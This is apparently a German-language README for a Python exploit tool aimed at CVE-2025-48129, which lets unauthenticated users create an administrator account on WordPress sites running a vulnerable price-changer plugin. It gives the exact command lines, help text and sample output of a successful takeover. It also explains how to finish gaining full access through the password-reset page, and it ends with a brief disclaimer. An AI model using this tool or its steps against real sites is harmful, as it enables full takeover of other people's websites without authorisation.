
WordPress Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light Plugin <= 2.4.37 ist anfällig für Privilegieneskalation
<= 2.4.37CVE-2025-481299.8 (Kritisch)Nicht authentifizierte Angreifer können Privilegien eskalieren, indem sie ein Administrator-Konto erstellen, ohne vorherigen Zugriff zu benötigen. Dies ermöglicht die vollständige Übernahme der WordPress-Seite.
Klassifiziert unter: OWASP A7 – Identifikations- und Authentifizierungsfehler
Dieses Python-Skript zielt auf anfällige Versionen des Plugins ab und registriert einen neuen WordPress-Administrator, wobei nur eine E-Mail und ein Passwort (per MD5 gehasht) verwendet werden.
python CVE-2025-48129.py -u http://target-site.com/wordpress -mail [email protected] -p nxploitadmin
python CVE-2025-48129.py -help
usage: CVE-2025-48129.py [-h] -u URL -mail MAIL [-p PASSWORD]
CVE-2025-48129 - Unauthenticated Privilege Escalation Exploit by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL (e.g., http://site.com/)
-mail, --mail MAIL Email for the new Admin account
-p, --password PASSWORD Password to set (default: nxploitadmin)
[*] Checking plugin version...
[*] Plugin version: 2.4.37
[*] Vulnerable version detected. Exploiting...
[+] Exploitation successful!
[*] Login credentials:
Username: [email protected]
Password: 21232f297a57a5a743894a0e4a801fc3
[*] If login fails, reset the password manually via:
http://target-site.com/wordpress/wp-login.php?action=lostpassword
In einigen Fällen kann das direkte Einloggen mit dem gewählten Passwort fehlschlagen.
Dies ist kein Fehler im Exploit, sondern eine Folge davon, wie das verwundbare Plugin gehashte Passwörter an das interne Benutzererstellungssystem von WordPress übergibt.
Wenn Sie sich nicht anmelden können, setzen Sie das Passwort einfach per E-Mail zurück, indem Sie die folgende URL verwenden:
http://target-site.com/wordpress/wp-login.php?action=lostpassword
WordPress sendet eine E-Mail zum Zurücksetzen des Passworts an das soeben erstellte Administrator-Konto – wodurch Sie vollen Zugriff erhalten.
Dieses Tool wird ausschließlich zu Bildungs- und autorisierten Penetrationstestzwecken bereitgestellt.
Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Skript verursacht werden.
Von: Nxploited (Khaled_alenazi)